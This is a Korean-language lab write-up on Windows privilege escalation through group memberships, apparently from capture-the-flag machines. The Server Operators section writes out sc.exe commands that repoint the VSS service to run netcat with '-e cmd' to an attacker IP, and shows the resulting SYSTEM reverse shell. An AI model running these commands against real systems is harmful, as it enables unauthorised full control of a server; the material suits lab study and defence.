whoami /groups

1. Server Operators

Server Operators 같은 경우 Administrator 다음 가는 2인자의 권한을 갖는 그룹이다. 이 권한을 갖고 있으면 사실상 서버를 장악했다고 할 수 있다.

해당 권한을 가지고 있으면 서버 유지보수를 위해 서비스를 끄고 켤 수 있는 권한을 가지고 있고, 백업이나 유지보수와 관련된 서비스에 수정 권한이 있다. 그래서 VSS 와 같은 권한에 대해서 수정을 할 수 있다.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

1.1. VSS 권한 수정의 경우

Server Operators 권한을 갖고 있으면 VSS 같은 백업 서비스에 대해서 경로를 수정해서 실행시킬 수 있다. 그러면 나의 해킹 툴을 대신 실행시킬 수 있으므로, nc.exe 와 같은 파일을 전송한 뒤에 nc 연결을 나의 kali 로 할 수 있을 것이다.

그렇다면 cmd.exe 를 실행시켜서 나의 nc를 실행하도록 만들고 nc를 통해 나의 kali 로 접근할 수 있도록 명령어를 넣어준 다음에 VSS 를 실행시킨다.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe config VSS binpath="C:\windows\system32\cmd.exe /c C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.143 443"
[SC] ChangeServiceConfig SUCCESS

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe start VSS
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

kali 에서 443 포트로 listen 하고 있었다면 SYSTEM 권한으로 실행한 nc 로 인해 SYSTEM 권한을 가진 쉘을 획득할 수 있다.

┌──(root㉿kali)-[/home/kali/labs/Return]
└─# nc -lvnp 443                                     
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.36.125] 58348
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

1.1.1. 참고사항

cmd 를 실행시키지 않고 바로 nc 를 아래오 같이 실행시킬 수도 있다. 하지만 이게 정상작동 하지 않는 이유는 Windows 서비스는 실행 후 ‘정상적으로 켜짐’ 이라는 신호를 OS에게 보내야 하지만 nc의 경우 그런 기능이 없어서 신호를 보내지 않는다. 그래서 Windows 는 응답이 없는 거로 간주하고 오류로 판단하기 때문에 프로세스를 종료시킨다.

sc.exe config VSS binpath="C:\programdata\nc64.exe -e cmd 10.10.14.6 443"

그렇기 때문에 먼저 cmd를 실행시키고 해당 cmd가 다시 nc를 실행시키는 행위로 변경을 했다. 그렇다면 cmd.exe 의 경우에는 응답을 Windows 에게 보내지 않지만 cmd.exe는 nc.exe 를 실행시켰고, cmd.exe 가 강제로 종료되더라도 자식 프로세스는 살아남아서 연결을 유지할 수 있다.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe config VSS binpath="C:\windows\system32\cmd.exe /c C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.143 443"
[SC] ChangeServiceConfig SUCCESS

*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Audit Share                         Alias            S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

3. Backup Operators

Backup Operators 그룹의 구성원은 해당 파일을 보호하는 권한과 관계없이 컴퓨터 내의 모든 파일을 백업하고 복원할 수 있다.

비록 이 그룹의 구성원이 서버 설정을 변경하거나 디렉터리 구성을 수정할 수는 없지만, 도메인 컨트롤러의 파일을 교체(덮어쓰기)하는 데 필요한 권한을 가지고 있다. 이 그룹의 구성원은 도메인 컨트롤러의 파일을 교체할 수 있기 때문에 서비스 관리자로 간주된다.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

whoami /groups

1. Server Operators

1.1. VSS 권한 수정의 경우

1.1.1. 참고사항

2. Audit Share

3. Backup Operators